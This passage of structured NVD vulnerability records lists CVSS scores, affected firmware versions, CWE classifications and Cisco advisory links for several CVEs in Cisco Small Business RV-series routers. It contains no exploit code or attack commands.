               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.8,
            impactScore: 4,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "ADJACENT_NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.4,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.8,
            impactScore: 4,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2021-04-08T04:15:11.860",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-119",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-401",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-08-10 08:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DC1EBF8C-DC2F-422A-BB5A-8EBA8F68C10D",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC2F28CC-7FD9-4CAE-86C5-E86C0874561B",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2093B7CE-9902-4D0B-BC86-8582DEACF696",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9B1CF205-B0AB-40C7-BA28-BF458CCC9EAF",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E045BFA8-1EED-4793-A2A9-46D4B68BD685",
                     versionEndExcluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "21586C44-B44A-44DB-81C2-E12A750A7840",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CC3876E6-885E-4AC7-A04F-DF91CEDF0385",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "185E81E5-49D7-49CC-ABCB-C9ECF612A6E2",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3BAA3B86-EE3C-45BD-ACC6-64742DFB71E9",
                     versionEndExcluding: "1.0.03.26",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en los routers Cisco Small Business de las series RV160, RV260, RV340 y RV345 podrían permitir a un atacante remoto no autenticado ejecutar código arbitrario o causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20841",
   lastModified: "2024-11-21T06:43:39.987",
   metrics: {
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "HIGH",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.2,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "HIGH",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 9,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.2,
            impactScore: 6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-08-10T08:15:07.317",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-120",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-02-10 18:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.



{
   cisaActionDue: "2022-03-17",
   cisaExploitAdd: "2022-03-03",
   cisaRequiredAction: "Apply updates per vendor instructions.",
   cisaVulnerabilityName: "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability",
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2C925382-A223-4342-83D2-53B3071F9B45",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDD6C848-8EF9-410A-B899-02F0E03EB653",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CE4C000C-89AB-4255-8D2B-4520BCB90490",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EA14E0B-442A-467D-92FF-369AD3A1A294",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "54D9FCD7-3DB5-413E-B504-8658A2D38EB7",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "30C2C2D2-9466-4A3F-A96C-166E32742C6C",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A21C17DD-A010-4744-9E06-DB845C5A1F00",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "428E4FFE-60EA-4BC1-BF13-FE50F5B093C0",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ED00C268-23EB-4743-8EF1-EEA2BE8A7566",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en los routers Cisco Small Business RV160, RV260, RV340 y RV345 Series podrían permitir a un atacante realizar cualquiera de las siguientes acciones Ejecutar código arbitrario. Elevar los privilegios. Ejecutar comandos arbitrarios. Omitir las protecciones de autenticación y autorización. Obtener y ejecutar software no firmado. Causar una denegación de servicio (DoS) Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20703",
   lastModified: "2024-11-21T06:43:21.950",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "LOCAL",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.2,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:L/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 10,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 3.9,
            impactScore: 6,
            source: "ykramarz@cisco.com",
            type: "Secondary",
         },
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "ADJACENT_NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 8,
               baseSeverity: "HIGH",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "REQUIRED",
               vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
               version: "3.1",
            },
            exploitabilityScore: 2.1,
            impactScore: 5.9,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2022-02-10T18:15:09.197",
   references: [
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-408/",
      },
      {
         source: "ykramarz@cisco.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-408/",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
      },
   ],
   sourceIdentifier: "ykramarz@cisco.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-121",
            },
         ],
         source: "ykramarz@cisco.com",
         type: "Secondary",
      },
      {
         description: [
            {
               lang: "en",
               value: "CWE-295",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2022-02-10 18:15
Modified
2024-11-21 06:43
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "2C925382-A223-4342-83D2-53B3071F9B45",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A4411AC-2A74-4315-BA6B-D7E1AA538BDB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DDD6C848-8EF9-410A-B899-02F0E03EB653",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "21E55019-F969-4ACD-A6C8-1D2EE05F8EE4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CE4C000C-89AB-4255-8D2B-4520BCB90490",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E91E68B-CBE9-462E-82D4-6F588B8E84E8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0EA14E0B-442A-467D-92FF-369AD3A1A294",
                     versionEndIncluding: "1.0.03.24",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5120BAB7-FB3A-481E-9ECD-48341846AFBD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "54D9FCD7-3DB5-413E-B504-8658A2D38EB7",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EC1DC21D-8C6C-4CE7-B5CB-8646659B02BC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "30C2C2D2-9466-4A3F-A96C-166E32742C6C",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B7E3792-5D0F-4CCC-874D-512059CA8E12",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A21C17DD-A010-4744-9E06-DB845C5A1F00",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "6FFC99C1-954E-408B-8A08-C79941350F05",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "428E4FFE-60EA-4BC1-BF13-FE50F5B093C0",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "A62A6E2F-FA43-4F40-A684-651FEDAC2114",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ED00C268-23EB-4743-8EF1-EEA2BE8A7566",
                     versionEndIncluding: "1.0.01.05",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "95737F9F-1779-4AAB-875E-2CD586A8B780",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
      },
      {
         lang: "es",
         value: "Múltiples vulnerabilidades en los routers Cisco Small Business RV160, RV260, RV340 y RV345 Series podrían permitir a un atacante realizar cualquiera de las siguientes acciones Ejecutar código arbitrario. Elevar los privilegios. Ejecutar comandos arbitrarios. Omitir las protecciones de autenticación y autorización. Obtener y ejecutar software no firmado. Causar una denegación de servicio (DoS) Para obtener más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso",
      },
   ],
   id: "CVE-2022-20706",
   lastModified: "2024-11-21T06:43:22.427",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 9.3,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:N/AC:M/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV31: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 10,
               baseSeverity: "CRITICAL",
               confidentialityImpact: "HIGH",
               integrityImpact: "HIGH",
               privilegesRequired: "NONE",
               scope: "CHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
